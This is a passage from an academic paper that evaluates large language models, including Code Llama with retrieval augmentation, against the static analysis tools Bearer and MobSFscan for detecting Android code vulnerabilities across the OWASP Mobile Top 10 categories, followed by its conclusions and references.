Additionally, Table 4 presents the results regarding the use of RAG on Code Llama. As explained in subsection 3.3, in this experiment, only half of the samples per vulnerability were indexed for RAG, along with text and code examples from Android’s app security guidelines [44] and all the CVEs related to the vulnerable libraries used for M2. After that, we analyzed the other half of the samples, i.e., those without code comments on the particular vulnerability. As observed from Table 4, the results show improvements in both the detection performance and the generation of code suggestions vis-à-vis the base model. Precisely, by being fed a large list of vulnerable libraries, the optimized Code Llama model achieved a perfect score for M2, an improvement of approximately 233% compared to that in Table 1. Nevertheless, for reaching this performance in real-world scenarios, the RAG process should involve an up-to-date dataset comprising known vulnerable library versions. Interestingly, apart from M2, the optimized Code Llama model detected the vulnerabilities and suggested improvements for all the M1, M3, M4, M5, M6, and M7 samples. As seen in the three bottom rows of Table 4, a nearly perfect performance (4/5) was also observed for the M8, M9, and M10 samples.
Table 4: Detection (D) and improvement (I) results for Code Llama with RAG over the non-annotated half of Vulcorpus (5 samples per category; 10 vulnerable libraries for M2).

Vulnerability | D | I
---|---|---
M1 | 5/5 | 5/5 |
M2 | 10/10 | N/A |
M3 | 5/5 | 5/5 |
M4 | 5/5 | 5/5 |
M5 | 5/5 | 5/5 |
M6 | 5/5 | 5/5 |
M7 | 5/5 | 5/5 |
M8 | 4/5 | 4/5 |
M9 | 4/5 | 5/5 |
M10 | 4/5 | 5/5 |
As previously mentioned, the performance of the LLMs was also compared against two reputable SASTs, namely Bearer and MobSFscan. Precisely, as shown in Table 5, across the 100 samples of Vulcorpus, Bearer found 29 security issues, while MobSFscan detected 12. Excluding M2, this result suggests that, for several vulnerability types, the performance of at least some of the LLMs may significantly, or even by far, surpass that of well-known SASTs. For instance, comparing the numbers of Table 5 with the average scores of Table 3, it can be argued that the former observation applies especially to M3, M4, and M9, and to a smaller extent to M1, M6, and M7. Moreover, a side conclusion is that both the LLMs and the SASTs score well on certain vulnerabilities, i.e., M10, and to a lesser extent M5; nevertheless, this is somewhat expected, given that vulnerabilities of these two types are generally considered easier to detect.
Table 5: Number of security issues detected by each SAST tool per OWASP Mobile Top 10 category across the 100 Vulcorpus samples.

SAST | M1 | M2 | M3 | M4 | M5 | M6 | M7 | M8 | M9 | M10 | Total
---|---|---|---|---|---|---|---|---|---|---|---
Bearer | 2 | N/A | 0 | 1 | 6 | 3 | 3 | 4 | 3 | 7 | 29 |
MobSFscan | 2 | N/A | 0 | 0 | 1 | 1 | 1 | 3 | 0 | 4 | 12 |
5 Conclusions
Our study provides empirical evidence regarding the effectiveness of using LLMs for Android code vulnerability analysis. GPT-4 and Code Llama emerged as the top performers among the nine LLMs tested, the latter excelling in detection but failing to provide sufficient code improvements, and the former showing promising results in both detection and code improvement. Notably, the study highlights the superior performance of specific LLMs for particular types of vulnerabilities. For instance, MistralOrca and Zephyr Beta performed exceptionally well for M9, while Zephyr Alpha excelled in M10. These findings suggest that while some LLMs have a general proficiency in vulnerability detection, others may be more specialized, indicating the potential for strategic selection of LLMs based on the targeted vulnerability type. When comparing open-source models with commercial ones, we can see that the open models were the best performers in seven out of ten vulnerability categories, i.e., M3, M4, M5, M7, M8, M9, and M10. On the other hand, considering the mean detection and improvement scores presented in Table 1, the situation is mixed.
Our findings also reveal that while some LLMs are capable of detecting Android code vulnerabilities, their overall performance is still at an early stage. For example, several LLMs struggled with M7, while others were unable to identify M2, reflecting the inherent complexity and subtlety of such vulnerabilities. This outcome points to a need for further research towards enhancing LLMs’ capabilities in more nuanced areas of Android security. As an additional step, we evaluated the use of RAG for augmenting an LLM for vulnerability analysis, with our results demonstrating that RAG can significantly reinforce detection performance. Regarding the detection of privacy-invasive actions, the obtained results indicate a mixed level of sensitivity among the LLMs, with Zephyr Alpha being the top performer. However, MistralOrca’s inability to identify any potential privacy-invasive actions underscores the variability in performance and the need for increased model robustness in privacy analysis concerning mobile platforms. No less important, after comparing the performance of LLMs with that of well-respected SASTs on the same set of vulnerable samples, it can be said that the former seem more adept at identifying code vulnerabilities.
Altogether, the results of the present study provide valuable insights into the current state of LLMs in Android vulnerability detection. While certain models show high efficacy, there is ample room for improvement and targeted optimizations, particularly in addressing complex and subtle vulnerabilities. Nevertheless, for obtaining a more complete view, more experiments with larger datasets are needed.
References
- [1] Lookout. Mobile Threat Landscape Report: 2023 in Review. https://www.lookout.com/threat-intelligence/report/mobile-landscape-threat-report, 2023. last visited 10/3/2024.
- [2] OWASP. Mobile Top 10 2024: Final Release Updates. https://owasp.org/www-project-mobile-top-10/, 2024. last visited 10/3/2024.
- [3] Vasileios Kouliaridis, Georgios Karopoulos, and Georgios Kambourakis. Assessing the security and privacy of android official id wallet apps. Information, 14(8), 2023.
- [4] Kenneth Ward Church. Word2vec. Natural Language Engineering, 23(1):155–162, 2017.
- [5] Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. Bert: Pre-training of deep bidirectional transformers for language understanding, 2019.
- [6] Irene Solaiman, Miles Brundage, Jack Clark, Amanda Askell, Ariel Herbert-Voss, Jeff Wu, Alec Radford, Gretchen Krueger, Jong Wook Kim, Sarah Kreps, Miles McCain, Alex Newhouse, Jason Blazakis, Kris McGuffie, and Jasmine Wang. Release strategies and the social impacts of language models, 2019.
- [7] OpenAI. OpenAI. https://openai.com/, 2024. last visited 10/3/2024.
- [8] Tom B. Brown et al. Language models are few-shot learners, 2020.
- [9] Yao Wan, Wei Zhao, Hongyu Zhang, Yulei Sui, Guandong Xu, and Hai Jin. What do they capture? a structural analysis of pre-trained language models for source code. In Proceedings of the 44th International Conference on Software Engineering, ICSE ’22, page 2377–2388, New York, NY, USA, 2022. Association for Computing Machinery.
- [10] Jiawei Liu, Chunqiu Steven Xia, Yuyao Wang, and Lingming Zhang. Is your code generated by chatgpt really correct? rigorous evaluation of large language models for code generation, 2023.
- [11] Bearer. https://github.com/Bearer/bearer. last visited 10/3/2024.
- [12] Mobsfscan. https://github.com/MobSF/mobsfscan. last visited 10/3/2024.
- [13] M. Al-Hawawreh, A. Aljuhani, and Y. Jararweh. Chatgpt for cybersecurity: practical applications, challenges, and future directions. Cluster Computing, 26:3421–3436, 2023.
- [14] Yifan Yao, Jinhao Duan, Kaidi Xu, Yuanfang Cai, Zhibo Sun, and Yue Zhang. A survey on large language model (llm) security and privacy: The good, the bad, and the ugly. High-Confidence Computing, 4(2):100211, 2024.
- [15] Maanak Gupta, Charankumar Akiri, Kshitiz Aryal, Eli Parker, and Lopamudra Praharaj. From chatgpt to threatgpt: Impact of generative ai in cybersecurity and privacy. IEEE Access, 11:80218–80245, 2023.
- [16] Farzad Nourmohammadzadeh Motlagh, Mehrdad Hajizadeh, Mehryar Majd, Pejman Najafi, Feng Cheng, and Christoph Meinel. Large language models in cybersecurity: State-of-the-art, 2024.
- [17] Chandra Thapa, Seung Ick Jang, Muhammad Ejaz Ahmed, Seyit Camtepe, Josef Pieprzyk, and Surya Nepal. Transformer-based language models for software vulnerability detection. In Proceedings of the 38th Annual Computer Security Applications Conference, ACSAC ’22, page 481–496, New York, NY, USA, 2022. Association for Computing Machinery.
- [18] Zhihong Liu, Qing Liao, Wenchao Gu, and Cuiyun Gao. Software vulnerability detection with gpt and in-context learning. In 2023 8th International Conference on Data Science in Cyberspace (DSC), pages 229–236, 2023.
- [19] Moumita Das Purba, Arpita Ghosh, Benjamin J. Radford, and Bill Chu. Software vulnerability detection using large language models. In 2023 IEEE 34th International Symposium on Software Reliability Engineering Workshops (ISSREW), pages 112–119, 2023.
- [20] Gustavo Sandoval, Hammond Pearce, Teo Nys, Ramesh Karri, Siddharth Garg, and Brendan Dolan-Gavitt. Lost at C: A User Study on the Security Implications of Large Language Model Code Assistants. In 32nd USENIX Security Symposium (USENIX Security 23), pages 2205–2222, Anaheim, CA, August 2023. USENIX Association.
- [21] Puzhuo Liu, Chengnian Sun, Yaowen Zheng, Xuan Feng, Chuan Qin, Yuncheng Wang, Zhi Li, and Limin Sun. Harnessing the power of llm to support binary taint analysis, 2023.
- [22] Jin Wang, Zishan Huang, Hengli Liu, Nianyi Yang, and Yinhao Xiao. Defecthunter: A novel llm-driven boosted-conformer-based code vulnerability detection mechanism, 2023.
- [23] Anton Cheshkov, Pavel Zadorozhny, and Rodion Levichev. Evaluation of chatgpt model for vulnerability detection, 2023.
- [24] David Noever. Can large language models find and fix vulnerable software?, 2023.
- [25] Yuqiang Sun, Daoyuan Wu, Yue Xue, Han Liu, Wei Ma, Lyuye Zhang, Miaolei Shi, and Yang Liu. Llm4vuln: A unified evaluation framework for decoupling and enhancing llms’ vulnerability reasoning, 2024.
- [26] Sihao Hu, Tiansheng Huang, Fatih İlhan, Selim Furkan Tekin, and Ling Liu. Large language model-powered smart contract vulnerability detection: New perspectives, 2023.
- [27] Janaka Senanayake, Harsha Kalutarage, Mhd Omar Al-Kadri, Luca Piras, and Andrei Petrovski. Labelled vulnerability dataset on android source code (lvdandro) to develop ai-based code vulnerability detection models. In Proceedings of the 20th International Conference on Security and Cryptography - SECRYPT, pages 659–666. INSTICC, SciTePress, 2023.
- [28] Vulcorpus-2024. https://github.com/billkoul/vulcorpus-2024. last visited 10/3/2024.
- [29] Android developers - manifest permissions. https://developer.android.com/reference/android/Manifest.permission#ACCESS_FINE_LOCATION. last visited 10/3/2024.
- [30] Android developers - mediastore. https://developer.android.com/reference/android/provider/MediaStore#ACTION_IMAGE_CAPTURE. last visited 10/3/2024.
- [31] Android developers - intent. https://developer.android.com/reference/android/content/Intent#ACTION_OPEN_DOCUMENT. last visited 10/3/2024.
- [32] What we know about the xz utils backdoor that almost infected the world. https://arstechnica.com/security/2024/04/what-we-know-about-the-xz-utils-backdoor-that-almost-infected-the-world/. last visited 17/4/2024.
- [33] Tom B. Brown et al. Language models are few-shot learners, 2020.
- [34] OpenAI. GPT-4 is OpenAI’s most advanced system, producing safer and more useful responses, 2024. last visited 10/3/2024.
- [35] OpenAI. Gpt-4 technical report, 2024.
- [36] Hugo Touvron et al. Llama 2: Open foundation and fine-tuned chat models, 2023.
- [37] Lewis Tunstall, Edward Beeching, Nathan Lambert, Nazneen Rajani, Kashif Rasul, Younes Belkada, Shengyi Huang, Leandro von Werra, Clémentine Fourrier, Nathan Habib, Nathan Sarrazin, Omar Sanseviero, Alexander M. Rush, and Thomas Wolf. Zephyr: Direct distillation of lm alignment, 2023.
- [38] Nous Hermes 2 Mixtral 8x7B DPO. https://huggingface.co/NousResearch/Nous-Hermes-2-Mixtral-8x7B-DPO. last visited 10/3/2024.
- [39] Wing Lian, Bleys Goodson, Guan Wang, Eugene Pentland, Austin Cook, Chanvichet Vong, and “Teknium”. Mistralorca: Mistral-7b model instruct-tuned on filtered openorcav1 gpt-4 dataset, 2023. last visited 10/3/2024.
- [40] Subhabrata Mukherjee, Arindam Mitra, Ganesh Jawahar, Sahaj Agarwal, Hamid Palangi, and Ahmed Awadallah. Orca: Progressive learning from complex explanation traces of gpt-4, 2023.
- [41] Shayne Longpre, Le Hou, Tu Vu, Albert Webson, Hyung Won Chung, Yi Tay, Denny Zhou, Quoc V. Le, Barret Zoph, Jason Wei, and Adam Roberts. The flan collection: Designing data and methods for effective instruction tuning, 2023.
- [42] Code llama. https://ai.meta.com/blog/code-Llama-large-language-model-coding/. last visited 10/3/2024.
- [43] Llamaindex. https://docs.llamaindex.ai/en/stable/. last visited 10/3/2024.
- [44] Security guidelines. https://developer.android.com/privacy-and-security/security-tips. last visited 10/3/2024.
- [45] Mobsf. https://github.com/MobSF/Mobile-Security-Framework-MobSF. last visited 10/3/2024.